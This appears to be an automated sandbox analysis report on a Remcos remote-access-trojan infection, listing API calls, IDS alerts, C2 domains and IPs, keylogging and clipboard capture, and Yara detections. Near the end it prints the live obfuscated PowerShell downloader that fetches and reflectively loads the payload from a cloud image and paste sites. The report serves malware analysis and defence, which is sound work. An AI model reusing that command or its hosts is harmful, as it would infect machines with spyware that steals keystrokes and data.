                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,21_2_0040B53A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0044D5E9 FindFirstFileExA,21_2_0044D5E9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,21_2_004089A9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00406AC2 FindFirstFileW,FindNextFileW,21_2_00406AC2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,21_2_00407A8C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,21_2_00418C69
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,21_2_00408DA7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,21_2_00406F06

                        Software Vulnerabilities

                        barindex
                        Suspicious execution chain found
                        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49795 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49829 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49830 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 104.21.84.67:443 -> 192.168.2.6:49784
                        Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 104.21.84.67:443 -> 192.168.2.6:49784
                        Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 104.21.84.67:443 -> 192.168.2.6:49784
                        Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 104.21.84.67:443 -> 192.168.2.6:49880
                        Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 104.21.84.67:443 -> 192.168.2.6:49880
                        Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 104.21.84.67:443 -> 192.168.2.6:49880
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\System32\wscript.exeNetwork Connect: 45.63.94.214 443Jump to behavior
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: rem.pushswroller.eu
                        Source: Malware configuration extractorURLs: firewarzone.ydns.eu
                        Source: Malware configuration extractorURLs: sun.drillmmcsnk.eu
                        Connects to a pastebin service (likely for C&C)
                        Source: unknownDNS query: name: paste.ee
                        Source: global trafficTCP traffic: 192.168.2.6:49795 -> 45.80.158.30:23101
                        Source: global trafficHTTP traffic detected: GET /r/IUrXP/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /r/IUrXP/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                        Source: Joe Sandbox ViewASN Name: UK2NET-ASGB UK2NET-ASGB
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49803 -> 178.237.33.50:80
                        Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49784 -> 104.21.84.67:443
                        Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49880 -> 104.21.84.67:443
                        Source: global trafficHTTP traffic detected: GET /LDDIb HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.rsConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /LDDIb HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.rsConnection: Keep-Alive
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_004260F7 recv,21_2_004260F7
                        Source: global trafficHTTP traffic detected: GET /LDDIb HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.rsConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /r/IUrXP/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /LDDIb HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.rsConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /r/IUrXP/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: paste.rs
                        Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                        Source: global trafficDNS traffic detected: DNS query: paste.ee
                        Source: global trafficDNS traffic detected: DNS query: rem.pushswroller.eu
                        Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                        Source: aspnet_compiler.exeString found in binary or memory: http://geoplugin.net/json.gp
                        Source: aspnet_compiler.exe, 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                        Source: aspnet_compiler.exe, 0000000F.00000002.2892055901.0000000000FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpR
                        Source: haematachometer.vbs.11.drString found in binary or memory: https://github.com/koswald/VBScript
                        Source: wscript.exe, 0000000E.00000003.2512795164.00000230DF5DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2479709616.00000230DD815000.00000004.00000020.00020000.00000000.sdmp, BBVA S.A..vbs, haematachometer.vbs.11.drString found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs
                        Source: wscript.exe, 00000000.00000003.2138819495.0000014C48B91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2480120754.00000230DF561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs_
                        Source: wscript.exe, 00000000.00000003.2172256961.0000014C48C08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2138399784.0000014C48BBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2138503358.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139016682.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2138734913.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2176246896.0000014C48C0F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2174559674.0000014C46D2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2173911891.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139136981.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139348876.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139195389.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2172680874.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2172776501.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2172464026.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2172626663.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2175053685.0000014C46DA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2175277697.0000014C48CA1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2138837387.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2174349568.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139271062.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2175798890.0000014C46DA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/koswald/VBScript/blob/master/SetupPerUser.md
                        Source: wscript.exe, 00000000.00000003.2139271062.0000014C48BA7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2138790827.0000014C48B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/koswald/VBScriptf
                        Source: wscript.exe, 00000000.00000002.2177586636.0000014C48D14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2174829728.0000014C48D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comL
                        Source: wscript.exe, 0000000E.00000003.2521837843.00000230DF710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.2537637767.00000230DF710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comr
                        Source: wscript.exe, 0000000E.00000002.2537637767.00000230DF710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.rs/
                        Source: wscript.exe, 00000000.00000002.2177267353.0000014C48B92000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2174050082.0000014C48B92000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2174763206.0000014C46DD4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2175656148.0000014C48DB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2177586636.0000014C48D14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2177059176.0000014C46DDB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2174559674.0000014C46DCC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2174920688.0000014C46DD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2174829728.0000014C48D12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2177245554.0000014C48B90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.2529422593.00000230DD806000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2525028654.00000230DD806000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2528176368.00000230DF562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2525218787.00000230DF845000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2517154757.00000230DF580000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.2532962670.00000230DF562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2519318326.00000230DF580000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2524709058.00000230DF562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2520710436.00000230DD7DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.2532698213.00000230DF560000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2517566946.00000230DF562000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.rs/LDDIb
                        Source: wscript.exe, 0000000E.00000002.2529422593.00000230DD806000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2525028654.00000230DD806000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2520710436.00000230DD7DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.rs/LDDIb8
                        Source: wscript.exe, 00000000.00000003.2174559674.0000014C46D2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2176015156.0000014C46D8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2176807263.0000014C46D8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2175053685.0000014C46D64000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2523814289.00000230DD840000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2526469472.00000230DD840000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.2529538333.00000230DD840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.rs/LDDIbs
                        Source: wscript.exe, 0000000E.00000003.2521837843.00000230DF710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.2537637767.00000230DF710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.rs/LDDIbt;
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                        Source: unknownHTTPS traffic detected: 45.63.94.214:443 -> 192.168.2.6:49713 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49784 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.63.94.214:443 -> 192.168.2.6:49790 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49880 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Contains functionality to register a low level keyboard hook
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000021_2_004099E4
                        Installs a global keyboard hook
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,21_2_004159C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,21_2_004159C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,21_2_004159C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,21_2_00409B10
                        Source: Yara matchFile source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 4544, type: MEMORYSTR

                        E-Banking Fraud

                        barindex
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2892055901.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2896720400.0000000002C1F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.2876508990.0000000001248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7924, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 4544, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Contains functionalty to change the wallpaper
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0041BB77 SystemParametersInfoW,21_2_0041BB77

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: Process Memory Space: aspnet_compiler.exe PID: 4544, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Windows Scripting host queries suspicious COM object (likely to drop second stage)
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                        Wscript starts Powershell (via cmd or directly)
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY